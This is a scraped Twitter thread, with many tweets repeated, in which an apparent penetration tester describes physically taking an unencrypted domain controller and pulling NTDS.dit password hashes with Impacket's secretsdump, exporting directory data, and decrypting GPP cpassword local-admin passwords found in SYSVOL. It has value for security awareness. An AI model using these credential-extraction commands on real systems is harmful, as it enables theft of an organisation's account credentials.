Read on Twitter
Well... a funny thing happened.
I stole a Domain Controller.
Like... physically stole it. I have it here with me. It& #39;s... well. It& #39;s unencrypted. I can mount it like a hard drive.
Now to figure out how to get info, such as user lists, out of it...
I stole a Domain Controller.
Like... physically stole it. I have it here with me. It& #39;s... well. It& #39;s unencrypted. I can mount it like a hard drive.
Now to figure out how to get info, such as user lists, out of it...
I& #39;ve only interacted with DCs from domain connected computers using & #39;net& #39; commands and powershell...
I& #39;ve even remotely connected to DC& #39;s and interacted with Active Directory using Remote Desktop Protocol...
But I& #39;ve never physically stolen and mounted a DC before.
I& #39;ve even remotely connected to DC& #39;s and interacted with Active Directory using Remote Desktop Protocol...
But I& #39;ve never physically stolen and mounted a DC before.
First thing, I might as well grab the NTDS.dit file and pull off hashes.
- That& #39;s found in: ...\Windows\NTDS\NTDS.dit
Need the system hive as well...
- That& #39;s found in: ...\Windows\System32\config\SYSTEM
Drag those over to my own host.
- That& #39;s found in: ...\Windows\NTDS\NTDS.dit
Need the system hive as well...
- That& #39;s found in: ...\Windows\System32\config\SYSTEM
Drag those over to my own host.
Impacket has a nice script to pull domain user accounts and hashes from local files. Thanks Impacket!!!
~/$ python http://secretsdump.py"> http://secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -outputfile lol.hash
Push those to my hashcracker....
https://github.com/SecureAuthCorp/impacket/blob/c328de825265df12ced44d14b36c688cd9973f5c/examples/secretsdump.py">https://github.com/SecureAut...
~/$ python http://secretsdump.py"> http://secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -outputfile lol.hash
Push those to my hashcracker....
https://github.com/SecureAuthCorp/impacket/blob/c328de825265df12ced44d14b36c688cd9973f5c/examples/secretsdump.py">https://github.com/SecureAut...
Alright. That gives me internal usernames and hashes. But I don& #39;t have the user information.
Normally I& #39;d do a:
C:\ net user <username> /domain
Or pull every user out via LDAP. Or something similar.
But how do I get the Active Directory user info from these files?!
Normally I& #39;d do a:
C:\ net user <username> /domain
Or pull every user out via LDAP. Or something similar.
But how do I get the Active Directory user info from these files?!
Seriously... I have no idea.
Brb while I duckduckgo this shit.
Brb while I duckduckgo this shit.
Also, don& #39;t ask about how I got the physical server rack. They slide out of the cabinet just fine, thank you!
Also also, running with a 4U rack "under" your arm is ungainly. Shits heavy and bulky, yo.
Also also, running with a 4U rack "under" your arm is ungainly. Shits heavy and bulky, yo.
Oh Lady Discordia... this NTDS.dit is huge....
What sort of out of the way, branch office, needs one this large?
What sort of out of the way, branch office, needs one this large?
Ok!!! I dumped everything!
I used impacket& #39;s & #39;esentutl& #39; python port & dumped all of NTDS.dit into a text file. Grepped for Employee Name, Email, Title, &c.
~/$ python http://esentutl.py"> http://esentutl.py ~/Loot/NTDS.dit export -table datatable > allTheThings.txt https://github.com/SecureAuthCorp/impacket/blob/master/examples/esentutl.py">https://github.com/SecureAut...
I used impacket& #39;s & #39;esentutl& #39; python port & dumped all of NTDS.dit into a text file. Grepped for Employee Name, Email, Title, &c.
~/$ python http://esentutl.py"> http://esentutl.py ~/Loot/NTDS.dit export -table datatable > allTheThings.txt https://github.com/SecureAuthCorp/impacket/blob/master/examples/esentutl.py">https://github.com/SecureAut...
Oh... Umm...
@UK_Daniel_Card reminded me to check GPP. So, I grepped SYSVOL (C:\Windows\SYSVOL\):
~/$ grep -r cpassword *
And found the cipher text for every workstations& #39; Local Admin password. Decrypted it with:
~/$ gpp-decrypt "<cpasswordcipher>"
I am now depressed.
@UK_Daniel_Card reminded me to check GPP. So, I grepped SYSVOL (C:\Windows\SYSVOL\):
~/$ grep -r cpassword *
And found the cipher text for every workstations& #39; Local Admin password. Decrypted it with:
~/$ gpp-decrypt "<cpasswordcipher>"
I am now depressed.
